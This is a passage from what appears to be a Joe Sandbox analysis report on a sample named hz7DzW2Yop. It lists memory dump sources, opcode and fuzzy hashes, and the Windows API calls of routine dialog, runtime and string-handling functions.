                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                  • Instruction ID: f87e793a814143b63c6beef01497e7d2182bce7cdbf7a386a885ce8672822005
                                                                                                  • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                  • Instruction Fuzzy Hash: BA524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 49012fb95aee48225fd24b8b3134dd5f1ada4f8db1ae7f49622f934726ea493b
                                                                                                  • Instruction ID: e4dc93811378abbaa3cd4ffda7743ff569d0174cc6124913039879dd902dc074
                                                                                                  • Opcode Fuzzy Hash: 49012fb95aee48225fd24b8b3134dd5f1ada4f8db1ae7f49622f934726ea493b
                                                                                                  • Instruction Fuzzy Hash: 6012B0B171870A9FC718CF68C490AB9F7F1FB98304F14892EE996C7680E734A995CB45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b819876e87db5704e986533dad419e1d5497c3173b5c77786d1b8c4c2774d28d
                                                                                                  • Instruction ID: 8eccc91b479667d5c0bacc14c0443989ffc9037d0c4af0168261dfc3c88ea6b5
                                                                                                  • Opcode Fuzzy Hash: b819876e87db5704e986533dad419e1d5497c3173b5c77786d1b8c4c2774d28d
                                                                                                  • Instruction Fuzzy Hash: 5CF18CB1A083028FC718CF28C49462ABBE5FFCA354F154B2EF495D7296D631E945CB46
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID:
                                                                                                  • API String ID: 3519838083-0
                                                                                                  • Opcode ID: 2495ef6a23355a18da970d6c547b2796123da993164145060a2e990f862e0cda
                                                                                                  • Instruction ID: c2714243b85c824dfcaa1eab891fb06b18a770c6eabd632cd716f3e586f4ad8e
                                                                                                  • Opcode Fuzzy Hash: 2495ef6a23355a18da970d6c547b2796123da993164145060a2e990f862e0cda
                                                                                                  • Instruction Fuzzy Hash: 50D1C4B1B083498FDB14CF28C94079BBBE5BF89308F04496DE8899B342D774E985CB56
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 842e7d676ff3391bd8b5b5c3b8b149674d521fb61f571f6597e620bb85657684
                                                                                                  • Instruction ID: 43e968a20217323ea6c39747f0325fd4b366037dd18cd5433f54f2090ba63ce2
                                                                                                  • Opcode Fuzzy Hash: 842e7d676ff3391bd8b5b5c3b8b149674d521fb61f571f6597e620bb85657684
                                                                                                  • Instruction Fuzzy Hash: 10E17DB951C3948FD314CF69D89086ABFF0AF8A300F45095EF9C497392C235EA19DB92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                  • Instruction ID: 1c2862b5a423ca7b534152f9526a45dcede9d39e788f879e96149da24dd8a528
                                                                                                  • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                  • Instruction Fuzzy Hash: 3A9159B130434E9BDB24EB64D894BFA77D8EBA8300F104D2CF9A6872C1DA7495C6C752
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                  • Instruction ID: df740fd41267de350b462e0297f7861e8843be9d10a2d1fa1ca7d9b3ef4e27a4
                                                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                  • Instruction Fuzzy Hash: 5281297130434A4FDB24DE68C8D1BFD77D5ABD9308F04492DF9868B2C2DA7489C68752
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09aa0131d04f5f8e5c63471c80a3e59a8555ed2637bea086c252efb60b39f57b
                                                                                                  • Instruction ID: b8303f9410b8e9e6c444b3fe31bae5d92bbba2429a77feb54966a797ee6edd29
                                                                                                  • Opcode Fuzzy Hash: 09aa0131d04f5f8e5c63471c80a3e59a8555ed2637bea086c252efb60b39f57b
                                                                                                  • Instruction Fuzzy Hash: 00618631A00F38E6CF38AA6878957BE239CEB41350F16191AE492DF2CDD2B5DC42C751
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                  • Instruction ID: d09f03d26b60df7ec9d293aab6a9df504e3f8dc7b5056815bd4d051a8b7178ce
                                                                                                  • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                  • Instruction Fuzzy Hash: AB513661348F7457DB345928BA56BFF23CD9B86300F1A0819E987CB28FC639ED458396
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d69f2f774ee9fbaef3fe1a362cf68eae87c9de679118f34c1b71fc2da4e239ac
                                                                                                  • Instruction ID: 86c6fa04cf2676ddd46e3476c53b6e2e855f8ec5bcc28d952e78b723073f0e71
                                                                                                  • Opcode Fuzzy Hash: d69f2f774ee9fbaef3fe1a362cf68eae87c9de679118f34c1b71fc2da4e239ac
                                                                                                  • Instruction Fuzzy Hash: 3251E23150C3958EC722CF24C1905AEBFF5AEDA314F0909A9E4D95B683C230DB4ACB62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 28edbb86d7946a97aed48fe6518c2be8c1f18fac245b84e9238e5e1051a510cb
                                                                                                  • Instruction ID: ad77808b9196d9a90b3eca79f868c847e95300d5da02e1f2461b2a6a1804f222
                                                                                                  • Opcode Fuzzy Hash: 28edbb86d7946a97aed48fe6518c2be8c1f18fac245b84e9238e5e1051a510cb
                                                                                                  • Instruction Fuzzy Hash: 9551E0B1A083159FC748CF19D48055AF7E1FF88314F058A2EE899E3300D735E999CB96
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                  • Instruction ID: ffffd37b10bc10d7d6c1d9474f735ac360571f915c2b0d93c8be7128b006a14e
                                                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                  • Instruction Fuzzy Hash: B23118B1B1474A8FCB14DF28C8512AEBBE0FB95314F14892DE889D7341C734EA4ACB91
                                                                                                  APIs
                                                                                                  • _swprintf.LIBCMT ref: 0090E30E
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                    • Part of subcall function 00911DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00941030,00000200,0090D928,00000000,?,00000050,00941030), ref: 00911DC4
                                                                                                  • _strlen.LIBCMT ref: 0090E32F
                                                                                                  • SetDlgItemTextW.USER32(?,0093E274,?), ref: 0090E38F
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0090E3C9
                                                                                                  • GetClientRect.USER32(?,?), ref: 0090E3D5
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090E475
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0090E4A2
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0090E4DB
                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0090E4E3
                                                                                                  • GetWindow.USER32(?,00000005), ref: 0090E4EE
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0090E51B
                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0090E58D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                  • String ID: $%s:$CAPTION$d
                                                                                                  • API String ID: 2407758923-2512411981
                                                                                                  • Opcode ID: f2692b77b5bbc2d729a0bf237b4a43241336938d43f518de3389ab0178a5f7aa
                                                                                                  • Instruction ID: f5a4540608d631eec6b8769a986474294e8efe10b9111485b7cac707b655e538
                                                                                                  • Opcode Fuzzy Hash: f2692b77b5bbc2d729a0bf237b4a43241336938d43f518de3389ab0178a5f7aa
                                                                                                  • Instruction Fuzzy Hash: 9781A172208301AFD710DFA8CC89B6FBBE9EBC9704F05491DFA84D7291D670E9058B52
                                                                                                  APIs
                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0092CB66
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C71E
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C730
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C742
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C754
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C766
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C778
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C78A
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C79C
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7AE
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7C0
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7D2
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7E4
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7F6
                                                                                                  • _free.LIBCMT ref: 0092CB5B
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 0092CB7D
                                                                                                  • _free.LIBCMT ref: 0092CB92
                                                                                                  • _free.LIBCMT ref: 0092CB9D
                                                                                                  • _free.LIBCMT ref: 0092CBBF
                                                                                                  • _free.LIBCMT ref: 0092CBD2
                                                                                                  • _free.LIBCMT ref: 0092CBE0
                                                                                                  • _free.LIBCMT ref: 0092CBEB
                                                                                                  • _free.LIBCMT ref: 0092CC23
                                                                                                  • _free.LIBCMT ref: 0092CC2A
                                                                                                  • _free.LIBCMT ref: 0092CC47
                                                                                                  • _free.LIBCMT ref: 0092CC5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                  • String ID:
                                                                                                  • API String ID: 161543041-0
                                                                                                  • Opcode ID: f5b9bd3a773884e02ff67a92464f3f3aad85c18690c882da7965be31f790bf1d
                                                                                                  • Instruction ID: fba22cfdc55da538721b906f0235554e7e69d5daf7f066059cf12e480f3a05db
                                                                                                  • Opcode Fuzzy Hash: f5b9bd3a773884e02ff67a92464f3f3aad85c18690c882da7965be31f790bf1d
                                                                                                  • Instruction Fuzzy Hash: AB315CB16013259FEB20AA39F84AB5B77E9AF50310F104829F588D72EADF31EC44CB10
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 00919736
                                                                                                  • _wcslen.LIBCMT ref: 009197D6
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 009197E5
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00919806
                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0091982D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                  • API String ID: 1777411235-4209811716
                                                                                                  • Opcode ID: d584f2cc77995d7c34e4ef05edba716b40e3fc258b5fde179723d280f29b218b
                                                                                                  • Instruction ID: faec5ac2021f7462bf821570fde8b7987d62cffebe2a8e719aa53384de189b4a
                                                                                                  • Opcode Fuzzy Hash: d584f2cc77995d7c34e4ef05edba716b40e3fc258b5fde179723d280f29b218b
                                                                                                  • Instruction Fuzzy Hash: AA3148326083157BE725AF60AC06FABB79CDFC2314F15411DF501A61D2EB64DA4887A6
                                                                                                  APIs
                                                                                                  • GetWindow.USER32(?,00000005), ref: 0091D6C1
                                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0091D6ED
                                                                                                    • Part of subcall function 00911FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0090C116,00000000,.exe,?,?,00000800,?,?,?,00918E3C), ref: 00911FD1
                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0091D709
                                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0091D720
                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0091D734
                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0091D75D
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0091D764
                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0091D76D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                  • String ID: STATIC
                                                                                                  • API String ID: 3820355801-1882779555
                                                                                                  • Opcode ID: d3ef743173f75f1cd3fa0262ea1bcb8277320ff73fea1b24b4ff45469fe5eef8
                                                                                                  • Instruction ID: a1cb973fccf1a481b6b385c41ffe8146a0ecbff625c32ad086c585115079fd73
                                                                                                  • Opcode Fuzzy Hash: d3ef743173f75f1cd3fa0262ea1bcb8277320ff73fea1b24b4ff45469fe5eef8
